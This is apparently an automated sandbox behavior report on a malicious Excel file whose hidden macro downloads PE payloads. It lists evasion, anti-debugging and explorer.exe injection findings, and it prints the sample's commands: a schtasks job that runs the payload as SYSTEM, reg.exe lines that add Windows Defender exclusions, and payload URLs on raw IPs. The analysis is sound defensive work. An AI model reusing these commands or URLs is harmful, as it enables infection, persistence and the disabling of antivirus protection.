Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2088 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 840 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2692 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2904 Thread sleep count: 71 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2536 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2936 Thread sleep count: 63 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2936 Thread sleep time: -104000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2116 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2428 Thread sleep count: 99 > 30 Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2952 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2908 Thread sleep count: 2670 > 30 Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2908 Thread sleep count: 2578 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat Jump to dropped file
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 2670 Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 2578 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 4_2_1000D01F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW, 4_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW, 5_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW, 8_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000EAEB4 FindFirstFileW,FindNextFileW, 11_2_000EAEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1000AEB4 FindFirstFileW,FindNextFileW, 12_2_1000AEB4

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 4_2_10005F82
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000DFAD LoadLibraryA,GetProcAddress, 4_2_1000DFAD
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E4495 or ebx, dword ptr fs:[00000030h] 8_2_005E4495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D4495 or ebx, dword ptr fs:[00000030h] 12_2_001D4495
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00085A61 RtlAddVectoredExceptionHandler, 5_2_00085A61

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2124 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2124 base: DF102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2988 base: 80000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2988 base: DF102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2544 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2544 base: DF102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 284 base: 80000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 284 base: DF102D value: E9 Jump to behavior
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Compensation-2308017-09272021.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_000831C2 CreateNamedPipeA, 5_2_000831C2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 4_2_1000980C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 4_2_1000D01F
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 491573 Sample: Compensation-2308017-09272021.xls Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 73 Document exploit detected (drops PE files) 2->73 75 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->75 77 Sigma detected: Schedule system process 2->77 79 7 other signatures 2->79 9 EXCEL.EXE 194 38 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 67 190.14.37.178, 49167, 80 OffshoreRacksSAPA Panama 9->67 69 185.183.96.67, 49168, 80 HSAE Netherlands 9->69 71 185.250.148.213, 49169, 80 FIRSTDC-ASRU Russian Federation 9->71 57 C:\Users\user\...\44466.7516903935[3].dat, PE32 9->57 dropped 59 C:\Users\user\...\44466.7516903935[2].dat, PE32 9->59 dropped 61 C:\Users\user\...\44466.7516903935[1].dat, PE32 9->61 dropped 95 Document exploit detected (UrlDownloadToFile) 9->95 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        32 regsvr32.exe 20->32         started        34 regsvr32.exe 22->34         started        87 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->87 89 Injects code into the Windows Explorer (explorer.exe) 24->89 91 Writes to foreign memory regions 24->91 93 2 other signatures 24->93 36 explorer.exe 8 1 24->36         started        process9 file10 97 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->97 99 Injects code into the Windows Explorer (explorer.exe) 29->99 101 Writes to foreign memory regions 29->101 39 explorer.exe 8 1 29->39         started        103 Allocates memory in foreign processes 32->103 105 Maps a DLL or memory area into another process 32->105 42 explorer.exe 32->42         started        45 WMIADAP.exe 4 32->45         started        47 explorer.exe 34->47         started        55 C:\Users\user\Drezd.red, PE32 36->55 dropped 107 Uses cmd line tools excessively to alter registry or file data 36->107 49 reg.exe 1 36->49         started        51 reg.exe 1 36->51         started        signatures11 process12 file13 81 Uses cmd line tools excessively to alter registry or file data 39->81 83 Drops PE files to the user root directory 39->83 85 Uses schtasks.exe or at.exe to add and modify task schedules 39->85 53 schtasks.exe 39->53         started        63 C:\Users\user\Drezd1.red, PE32 42->63 dropped 65 C:\Users\user\Drezd2.red, PE32 47->65 dropped signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.183.96.67
 unknown Netherlands
60117 HSAE false
190.14.37.178
 unknown Panama
52469 OffshoreRacksSAPA false
185.250.148.213
 unknown Russian Federation
48430 FIRSTDC-ASRU false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.250.148.213/44466.7516903935.dat false
  • Avira URL Cloud: safe
 unknown
http://185.183.96.67/44466.7516903935.dat false
  • Avira URL Cloud: safe
 unknown
http://190.14.37.178/44466.7516903935.dat false
  • Avira URL Cloud: safe
 unknown